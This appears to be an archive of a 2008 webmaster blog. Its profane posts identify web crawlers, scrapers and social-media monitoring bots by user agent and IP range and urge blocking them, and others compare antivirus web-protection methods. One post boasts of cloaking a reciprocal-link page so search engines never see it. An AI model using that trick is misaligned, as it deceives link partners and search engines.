Various companies use the static method which relies on crawling the web in advance to find vulnerabilities and then attempt to warn visitors about these problems as they are about to visit a web site. McAfee's SiteAdvisor and Google both take this approach and it's obviously only as good as your last scan and the malware can easily be cloaked and hidden from these somewhat obvious crawlers. Besides easily being fooled with cloaking, the data is always stale meaning sites good even 10 minutes ago could now be infested with malware and sites previously infested could have been cleaned.

This method isn't optimum for anyone and can be a nightmare for websites tagged as bad to get off the warning list assuming they ever find out they're on it in the first place as their business goes down in flames from traffic going elsewhere.

Active Web Protection

The latest AVG 8 includes a Link Scanner and AVG Search-Shield which aggressively checks pages in Google search results that you're about to visit in real time to help protect the surfer. Unfortunately, AVG made several mistakes, some that could be deemed fatal flaws, which allows this technology to be easily identified so that malware and phishing sites can easily cloak to avoid AVG's detection. Even worse for webmasters is that AVG pre-fetches pages in search results and as adoption of this latest AVG toolbar increases, it is quickly turning into a potential DoS attack on popular sites that show up at the top of Google's most popular searches.

While I think AVG's intentions were good, their current implementation easily identifies every customer using their product and causes webmasters needless bandwidth issues that could be easily resolved on their part with a cache server.

Passive Web Protection

The method used by Avast's Anti-Virus is to use a transparent HTTP proxy meaning that all of your HTTP requests pass through in invisible intermediate proxy service that scans for potential problems in the data stream in real-time. The data is always fresh, checked in real-time, the user agent doesn't change and there are no pre-fetches or needless redundant hits on websites.

The only downside is you don't know the site is bad in advance but that can easily be the case with static protection due to stale data and/or cloaking and active protection due to cloaking.

The Best of All

While the three approaches all have their potential problems it appears a combination of all three is probably the best approach.

Bad Site Database:
The SiteAdvisor/Google type database approach is good to log all known bad sites so they don't get a second chance to fool the other methods with cloaking once their are caught. This cuts down on redundantly checking known bad sites until the webmaster cleans it up and requests a review to clear their site's bad name.

Perhaps the Bad Site database concept needs to become a non-profit dot org so that all of the anti-virus companies can freely feed and use this database without all the corporate walls built up around the ownership of the data for the greater good, something like a SpamHaus type of thing or perhaps merged into SpamHaus.

Optimized Pre-Screening:
The AVG approach of pre-screening a site could be optimized by fixing the toolbar's user agent so it's not detectable and use a shared cache server to avoid behaving like a DoS attack on popular websites. The beauty is that the collective mind of all these toolbars with an undetectable user agent avoids the cloaking used to thwart detection associated with known crawlers. If the toolbar fed the results of these bad sites to the Bad Site Database, then there's a win-win for everyone.

Transparent Screening:
The final approach used by Avast should still be performed which is the HTTP proxy screening to that any site that manages to not be in the bad site database and still eludes the active pre-screening of pages, would hopefully get snared as the page loads into the machine.


When you pile up all of this security the chances of failure still exist but the end user is protected and informed as much as humanly possible from all of the threats present.

It would certainly be nice to see some of the anti-virus providers combine their efforts as outlined above to make the internet a safer place to visit.

Sunday, April 27, 2008

Off By More Than One

Can you believe that someone is actually surfing the web using some free browser called Off By One that doesn't appear to have been updated in the last 2 years?

The user agent is as follows:

"Mozilla/6.0(compatible;OffByOne;Windows 2000)"
The irregular formatting convention triggered the bot trap with the lack of spaces alone.

Then it claims to be Mozilla 6.0 when it's probably Mozilla 3.0 at best.

Considering how few times, if ever, that this browser has visited it's obviously very rare.

Maybe some online nerd activist will get it declared as an endangered online species so it will become protected by law.

Don't laugh, you know it'll happen eventually...

Sunday, April 20, 2008

Reciprocal Link Exchange? Let's Swap!

For years I've been deleting all those emails asking me to exchange links and I won't swap links with any of that crap.

Suddenly I've had an epiphany and YES!, now I'll swap links with you, no problem!

I'm only agreeing to swap links as requested.

I'm not using NOFOLLOW on those links as requested.

You can see my links when you visit, online and visible as agreed.

Unfortunately my link swapping page will never be seen by Google, Yahoo, MSN or any other search engine but you'll see it just fine.

I'm going to hold up my end of the bargain, we swapped links, how about you?

Kaushik, What Freaking Experiments?

I found this user agent coming out of Microsoft's Area 131 requesting that people "contact kaushik for these experiments" that kept hitting one of my servers. "contact kaushik for these experiments"
So I did a little data mining of my own and searched Microsoft and couldn't decide if this experiment was from Kaushik #1 or Kaushik #2.

Both Kaushik's appear to be working for the Data Management, Exploration and Mining Group (DMX) at Microsoft, but which one ran this experiment?

OK, will the real Kaushik running these experiments please stand up?

BTW, was your experiment finding sites running bot blockers?

If so, you succeeded and your requests were stopped. ;)

DNS Right But User Agent Wrong

Ran into a user agent from DNSRight today that claimed to be some link check tool that doesn't appear on their site. "GET / "
"" " WebBot Link Ckeck Tool. Report abuse to:"
So I ran some of their other tools that don't identify themselves at all. "GET / HTTP/1.1" "-" "-"
They host this mess at so just block 'em.
OrgName: California Regional Intranet, Inc.
NetRange: -
No more DNS Right or Left, it's now DNS Gone.

Thursday, April 17, 2008

Picmole, Yet Another Spybot!

There must be good money spying on everyone because it seems a new company springs up almost weekly trying to claim their stake in this new gold rush.

How many fucking spybots do we need?

Today on the spybot circuit the we're serving up a helping of Picmole that's using heritrix to do it's crawling. Surprisingly it still checks robots.txt but who knows if they'll honor it down the road because honoring robots.txt conflicts with accomplishing their stated goals.

Identifying their spider properly and crawling from easily identifiable IPs will also present them problems as their activities increase but being a new service they'll soon figure that out and probably go stealth like all the rest. [] requested 1 pages as "Mozilla/5.0 (compatible; heritrix/1.12.0 +"
Sorry, but your bot hit a firewall on your first attempt.

Abort, Retry, Ignore?

Favcollector Bandwidth Waster

Here's another product of Canada doing the stupidest shit ever seen, collecting favicons.

It came and grabbed my icon, then hit the home page which the bot blocker promptly stopped, so who the knows what else it would've done beyond that. [] "Favcollector/2.0 ("
From their FAQ:
Favcollector is a spider that searches the internet for favicons. It downloads and stores these favicons for each site it visits. It will go back once a month to see if the favicon has changed and will download the new icon if it is has, effictivly creating an archive of all favicons on the internet.

Spider my ass...

Spiders ask for robots.txt files, read them, and go away.

Not this piece of shit as it just comes and it takes what it wants without regard to the webmasters wishes.

Not only that, a bunch of trademarked icons are now on their site without permission which will most likely make some crazed trademark enforcers start jumping up and down once they find that site.

BTW, run a damn spell checker on your site as the word is effectively, not "effictivly" unless that's the Canadian spelling.

Canasasearchbot For Canasians, Oh Canasa!

It's hard to resist commenting on a bot that can't even spell it's own name or it's country name correctly. [] "canasasearchbot("
However they got it right on their robots page:
User-agent: canadasearchbot
It did ask for robots.txt but who knows if it was looking for "canasasearchbot" or "canadasearchbot", total crap shoot.

I tried their little search engine and it took it a really long time to come back with some really bad results.

Here's a "search tip", try searching your log file and examine what your crawler is putting in that log file before turning it loose on the world.

Nothing like that fine Canadian quality, eh?

Monday, April 14, 2008

Mozshot Tries Taking a Screenshot

Yet another Firefox-based screen shot tool hit my other site today just in time to take a screen shot of an error message telling them they weren't allowed to take screen shots without permission.

Details: []
"Mozilla/5.0 (Gecko/20070310 Mozshot/0.0.20070628;"
This thing appears to be open source, oh joy...

Friday, April 11, 2008

RTGI - The French Social Media Spybot

Yet another social media mining operation designed to track every bit of intel said about brands, people, politics and more.

From a translation of their site:

Our solutions simplify the identification of influential communities and monitoring of their conversations, to the benefit of businesses, communication agencies or research institutes.

RTGI's approach allows the analysis of the links and content generated by the citizens, journalists, consumers or activists, to draw the contours of communities conversations around your issues, brands and products and their real impact on your image online. RTGI have elaborated the linkfluence to give a unit of reliable measurement of the influence of the social web sites.
The highlighting was added to help you see how it facilitates spying on your ass without going to much effort to do so.

Heck, the French government is in their list of clients!
  • Information Service (GIS) government
  • Ministry of the Economy, Finance and Employment Ministry of the Economy, Finance and Employment
  • Picardy Regional Council (RENUPI)
Sheesh, didn't need to translate as they have an English .EU version too.

Oh well, I'm not rewriting it!

Continuing on...

George Orwell obviously didn't anticipate the internet and he was off by a few years, 24 to be exact, but his overall message of Big Brother watching us in 1984 is finally coming true in 2008.

Anyway, back to the details:
"mozilla/5.0 (compatible; RTGI;"
The IP's they operate from are: -> -> -> -> ->
The old address of doesn't appear to be active since 04/13/2007 so I probably wouldn't worry about that too much unless you just want to block that dedicated hosting range for good measures.
inetnum: -
netname: FR-DEDIBOX
descr: Dedibox SAS
descr: Paris, France
The dedicated host they currently use has this range of IPs:
inetnum: -
netname: OVH
descr: OVH SAS
descr: Dedicated Servers
So there you go, another way to make your site part of the anti-social media by keeping the snoops out.

Project Rialto's PRCrawler Is Data Mining?

Since I whitelist allowed bots I've had Project Rialto blocked since the beginning but I was curious what they were doing since they first showed up on my radar on 01/23/2008 and kept coming back over and over.

From one of their job ads:

We are designing high-performance algorithms and developing reliable, fault-tolerant and scalable real-time systems that can handle massive volume of data for in-depth analysis of user behavior to enable targeted advertising.


Research and investigate academic and industrial data mining, machine learning and modeling techniques to apply to our specific business case
Oh boy!

It appears they want to crawl our sites and use that information to shove more ads in our face.

Somehow, I don't think so...

If you're going to mine data, shouldn't you get the URLs right?

The site they're attempting to "mine" is on a Linux box and URLs are case sensitive and my URLs all have upper/lower case in them yet the PRCrawler only asks for those URLs in all lower case so even if I left them crawl my site they'd get nothing but 404s.

No wonder their home page says they're a "stealth company" because I'd hide too if I couldn't even get the proper case of the URLs right.

Here's their user agent:
"PRCrawler/Nutch-0.9 (data mining development project;"
They operate from the following IPs:
The first two were from, the rest are all from
I haven't seen anything from since the initial contact but that's only 2 months ago so who knows.

Don't know where they primed the pump for their data mining operation since they already had lots of information about my site when they attempted to crawl, but since it was all lower case it was completely useless.

I'm just curious if they got it my URLs from somewhere already in lower case or someone there slapped a tolower() around a line of code when importing the URLs into Nutch.

Don't know, don't care, it's amusing either way.

Good luck with Project Rialto, you're going to need it.

Wednesday, April 09, 2008

Radian6's R6_FeedFetcher Fetching More Than Feeds

For those of you unfamiliar with Radian6 it's a "social media monitoring tool" because apparently everyone with an opinion on the internet needs someone to spy on their ass since we're disruptive.

Well bummer.

Isn't it a shame the good old days are gone where companies told you everything you needed to know about their brand and you had to be a journalist just to get your opinion heard?

Of course those so-called journalists never gave you their real opinion because of fear of losing advertisers so it was all candy coated bullshit that just bordered on the truth because advertisers couldn't handle the truth fearing nobody would buy their shit.

Tough shit and god bless the great equalizer called the Internet that leveled the playing field between consumers and companies so we can find out what's really going on without everything being filtered through the company spin doctor.

Their crawler details are: "R6_FeedFetcher("
The amusing thing about the R6_FeedFetcher is I never see it fetching the feed, instead it's trying to fetch pages linked from the feed, which is what we call a crawler and not a fucking feed fetcher.

Does it read robots.txt to see if it's allowed beyond my RSS feed?

Fuck no.

I looked at all accesses on my RSS feed and didn't see anything obvious so maybe they get RSS feeds from FeedBurner or something similar, who knows.

Anyway, it's blocked now on my other site so I can be as disruptive as I want there.

However, who wants to place bets that this disruptive post will be monitored?

P.S. The site R6_FeedFetcher is blocked on is not this blog for first time readers ;)


After doing some research it appears they also have the following user agent:
Also, read this interesting post about Radian6 on Simon's blog.

Friday, April 04, 2008

Discovery Engine's Discobot Discovered My Bot Blocker

I found this little Discobot from Discovery Engine trying to dance around on my server but the bot blocker bouncer at the door was already keeping him behind the velvet ropes.

Here's a sample of what I saw on my site: "GET /robots.txt"
"Mozilla/5.0 (compatible; discobot/1.0; +"
"Mozilla/5.0 (compatible; discobot/1.0; +"
It does honor robots.txt just like they said it did but it cached it for about 48 hours between visits.

They were nice enough to provide the range of IPs it uses: -
Those IPs are from Servepath which I already block.

Between whitelisting allowed bots and blocking more data centers then I'd care to admit, this poor little Discobot didn't stand a chance to discover anything.

Call back when you're all grown up and ready to send traffic.

Persaibot - The Rude Crawler

I saw this little Persaibot hit my site today without even looking at robots.txt and their website has the balls to say:

Persai uses this bot to crawl the web. It's probably the nicest bot with the greatest personality in the world. Seriously, give it some attention.
Exactly how nice can a bot be that doesn't read robots.txt?

Did you read it and cache it some other day?

Doesn't matter, that was more than 24 hours ago, read it again.

I checked my logs from yesterday, it didn't read it then either and Persai hadn't visited my site in about a month before that.

I'm sorry, you have made the huge faux pas in robot rudeness.

Here's the intel I have on this little bot: []
"PersaiBot/2.1-dev3a (Persai web crawler;; bot at persai dot com)" []
"Mozilla/5.0 (compatible; Persaibot/2.71828183; +" []
"Mozilla/5.0 (compatible; Persaibot/2.71828183; +"
Now the true irony here is that the CEO of Persai posted on his blog complaining about another search engine called Spock scraping every little bit of data about him but at least Spock claims to honor robots.txt.

Must be a karma thing ;)

DART Agent - Another Annoying Distributed Tool

This little annoying DART thing that keeps bouncing off my web site appears to be written by CRS4, the Center for Advanced Studies, Research and Development in Sardinia.

It would appear DART stands for "Distributed Agent-based Retrieval Tools" and they even have a workshop in '06 about this damn thing touted as "The Future of Search Engines' Technologies" that had people from Yahoo!, Google, Quaero and Ask attending.

Here's a sample of some IPs it operates from and the shitload of versions this thing has: "DART Agent, version 1.2 (build 14062007)" "DART Agent, version 1.2.7 (build 27062007)" "DART Agent, version 1.4 (build 17102007)" "DART Agent, version 1.4 (build 29102007)" "DART Agent, version 1.4.1 (build 05112007)" "DART Agent, version 1.4.2 (build 08112007)" "DART Agent, version 1.4.3 (build 15112007)" "DART Agent, version 1.4.3 (build 19112007)" "DART Agent, version 1.4.4 (build 05122007)" "DART Agent, version 1.4.5 (build 06122007)" "DART Agent, version 1.4.6 (build 14012008)" "DART Agent, version 1.4.6 (build 14012008)" "DART Agent, version 1.4.7 (build 24012008)" "DART Agent, version 1.4.8 (build 04022008)" "DART Agent, version 1.5 (build 08022008)" "DART Agent, version 1.5.1 (build 14022008)" "DART Agent, version 1.5.2 (build 18022008)" "DART Agent, version 1.5.5 (build 27022008)" "DART Agent, version 1.5.6 (build 28022008)" "DART Agent, version 1.5.6 (build 28022008)" "DART Agent, version 1.5.1 (build 14022008)" "DART Agent, version 1.5.7 (build 05032008)" "DART Agent, version 1.5.2 (build 18022008)" "DART Agent, version 1.5.8 (build 06032008)" "DART Agent, version 1.5.8 (build 06032008)" "DART Agent, version 1.5.8 (build 06032008)" "DART Agent, version 1.5.9 (build 19032008)" "DART Agent, version 1.5.8 (build 06032008)" "DART Agent, version 1.5.9 (build 20032008)" "DART Agent, version 1.5.8 (build 06032008)" "DART Agent, version 1.5.8 (build 06032008)" "DART Agent, version 1.6 (build 02042008)" "DART Agent, version 1.5.8 (build 06032008)" "DART Agent, version 1.6.0 (build 02042008)"
Looks like so far it's only operating out of Italy and they're nice enough to provide reverse DNS when it operates off their servers "" and even another source "" so the crawler could be verified but other sources couldn't be verified such as "" so it's going to be a problem child for anyone that wants to let it play but make sure it's not being spoofed.

Just what the web needs, more distributed web technology to bug the fuck out of webmasters just trying to scratch out a living on the internet.

Oh well, it can't play on my server so what the hell do I care anyway!

Saturday, March 29, 2008

WHO is Scraping My Site!

Note the lack of a question mark in the title because this wasn't a question about "WHO?" but an actual statement about "WHO!" and by that I mean the WHO as in an office of the World Health Organization.

It registered 411 page requests from which is a non-portable address assigned to the WHO Representative Office in Sri Lanka.

Here's the IP and UA:
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Here's the WHOIS:
inetnum: -
netname: WHO-SLT-LK
country: LK
descr: WHO Representative Office
descr: 385, Health Inform. Centre, Suwasiripaya, Deens Road, Colombo-10
admin-c: NS198-AP
tech-c: NS198-AP
mnt-by: MNT-SLT-LK
source: APNIC

person: Network Administrator SLTNet
nic-hdl: NS198-AP
address: Sri Lanka
country: LK
mnt-by: MNT-SLT-LK
source: APNIC
It pretended to be a human browser like so many of them do these days by pulling all the images from the index page and then it took off ripping pages like a bandit.

It wasn't even a smart bot as the first link it hit off the index page was my bot trap which is easily flagged and avoidable in the robots.txt as a no crawl zone, so it definitely wasn't human.

Of course the robots.txt file is my other bot trap but what the hell.

Then it went screaming along asking for the next 409 pages at 2-3 pages a second.

It would appear that WHO should check out the health of their computer network as something is rotten in their offices in Sri Lanka.

Friday, March 28, 2008

REBI-Shoveler Digging for Korean Search Engine

REBI-Shoveler must be easily overlooked as it's very unusual to go to a search engine and type in the user agent and get no authoritative hit from any bot hunter whatsoever. There were tons of hits from various web stat pages but nothing I could easily find that gave me any clue what in the hell this thing was.

With this little information all I knew was it came from Korea, otherwise I was stumped: "REBI-Shoveler v0.1"
Finally I decided to see if I could find any more clues in the several years of bot tracking archive files I keep and sure enough, there was a single original hit on my server that contained the answer I was looking for:
"REBI-Shoveler/RS Ver. -100.0 (REBI's great worker ... ;;"
This bot operates out of multiple IPs in the range of 116.122.36.* and here's a little translation for you from their site about REBI, but not mention about robots.txt nor did it ask for the file when it visited my site today, so it's behaving badly.

Now you know who REBI is that's shoveling shit off of your server.


We'll Have Anon Of That, John Doe Must Go

Looks like JonDonym - the internet anonymisation service is actively operating as those little anonymous hits are coming from their servers.

I have a couple of actual scrapes happening from their IPs, who would suspect abuse of anon proxies, right?

Here's a couple of examples of activity: []
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv: Gecko/20080311 Firefox/ []
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv: Gecko/20080311 Firefox/

Don't know what other IPs it operates from but 141.76.45.* and anything resolving to are blocked for now.

Good luck with your John Doe anonymity while I work on my taxes as you've just been H&R Blocked!

With tax deadlines close at hand I couldn't resist ;)

Monday, March 24, 2008

Please Install Flash - Idiots Guide To Flash Web Stupidity

Time to rant about a big pet peeve of mine, that little line of javascript that detects whether or not Flash is installed and the stupid shit developers do when it fails.

For a little introduction to the problem, I run Firefox with NoScript enabled globally for security purposes. However, I can easily enable javascript with a click except some developers do some really stupid shit that's costing their clients visitors.

Here's a few brain dead examples of Flash sites done wrong in the hands of idiots:

1. When javascript is disabled a blank page often results without even a hint, looks broken, visitors go away thinking you're stupid as dirt for putting up a blank page.

2. Redirecting visitors to a "Please Download Flash" page is just asinine. When visitors then enable javascript so your flash will work we're off on some other stupid page instead of where we wanted to go. Yup, frustrate your visitors and they'll just go elsewhere where sites aren't developed by designers that rode the short yellow bus to VoTech.

3. Using the NOSCRIPT tag to incorrectly tell us we don't have Flash installed because that tag actually means we have javascript disabled and you have no fucking clue if we have Flash installed or not until we turn on javascript you fucking idiots. Tell us correctly to ENABLE JAVASCRIPT to run the site in your NOSCRIPT tag and then let the javascript tell us we don't have Flash installed.

I'm sure I'll have some other addendums later but these are the top 3 offending things moronic Flash site developers do off the top of my head.

Anyone else got a pet Flash peeve?

Friday, March 14, 2008

SearchMe Demos Wicked Cool Visual Search Engine

Looks like I was right on the money back in Oct '07 when I announced that I had spotted SearchMe taking screen shots on one of my sites and I knew this was a hot news item but couldn't get the Sphinners to bite on it.

Here we are 6 months later and the story broke a couple of days ago on the Silicon Valley WebGuild:

Searchme is a new search engine that captures images of web pages and allows users to navigate visually through these page snapshots.
Searchme is currently running a private beta but the flash demo on their web site is real fucking cool so I hope their search technology is as good because this is so wicked it could be a real Google killer.

I'll bet Microsoft, Yahoo or Ask tries to buy this technology ASAP before Google can get their hands on it as something this hot could put any of the lesser search engines back on the map.

If you want information about their spider named Charlotte and IP addresses so you can let Searchme into your site and past your firewall, read my previous post with all the pertinent information.

Wednesday, March 12, 2008

Welcome to Opt-In Web 3.0 Politeness

Here's a fine example of how the internet may soon look with an email I got recently that actually asked permission to do something because they couldn't just take what they wanted without asking!

The following is slightly edited, but you get the idea:

We use a service called to provide xxxxxxxx of sites that we have links to on our site.

It appears that the is being blocked. I'm guessing this is a tool you use to block crawlers. You can see the error here:

Is there any way you can allow access of your site?
Yes, manners are still alive and well on the internet and someone has politely requested I punch a hole in the firewall and let them in.

I'm leaning towards YES just because they asked so nicely!

Witness one of the first steps in ending the Wild Wild Web.

Sunday, March 09, 2008

Gone Fishkin With More SEOMoz Tool Activity

In my continue series of exposing SEO tools we find this little SEOmoz-bot over at SEOmoz.

I'll give SEOmoz some credit where credit is due in they at least identify their tool as a bot so it can be blocked if you want. However, they don't check robots.txt to see if the bot is allowed as I think they assume it's always going to be used by the site owner but it could just as easily be used on some competitor's site as well.

Here are the IPs and the user agent used: "SEOmoz-bot" "SEOmoz-bot"
The IP's belong to HopOne which provides various services including hosting.
OrgName: HopOne Internet Corporation
NetName: HOPONE-DCA2-4
NetRange: -
I think that range is safe to block as it appears they use 'DC' in the net name of their data centers but it's probably worth checking to see what bounces for a few days to make sure.

Of course the best SEO is secure SEO, so block 'em ;)

Smack the SMILE SEO TOOLS Off Your Face

Some spamming assholes in Russia think automatic directory submission is the same as SEO and added one of my sites to their so called SMILE SEO TOOLS.

Here's a list of the various user agents I've seen claiming to be this tool:

The last user agent with an extremely lame ass attempt to mimic MSIE 6 gave me a good giggle.

Here's the list of IP's using this directory spamware, probably mostly proxy sites in Russia would be my guess as they have a ton of proxy sites for spamming over there.

Yes, 114 lovely IP's using SMILE SEO Tools for your veiwing pleasure:
Just to help you understand where these IP's were coming from, here's the reverse DNS of the same list:
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 2(SERVFAIL)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
;; reply from unexpected source:, expected
;; Warning: ID mismatch: expected ID 10615, got 39356
;; reply from unexpected source:, expected
;; Warning: ID mismatch: expected ID 10615, got 39356
;; connection timed out; no servers could be reached is an alias for
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
;; connection timed out; no servers could be reached
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Well, doesn't that really sum it up well?

Enjoy the list, block 'em if you want.

Heck, just block the entire country of Russia and the Ukraine entirely and hide the children in your bomb shelter just in case they get pissed.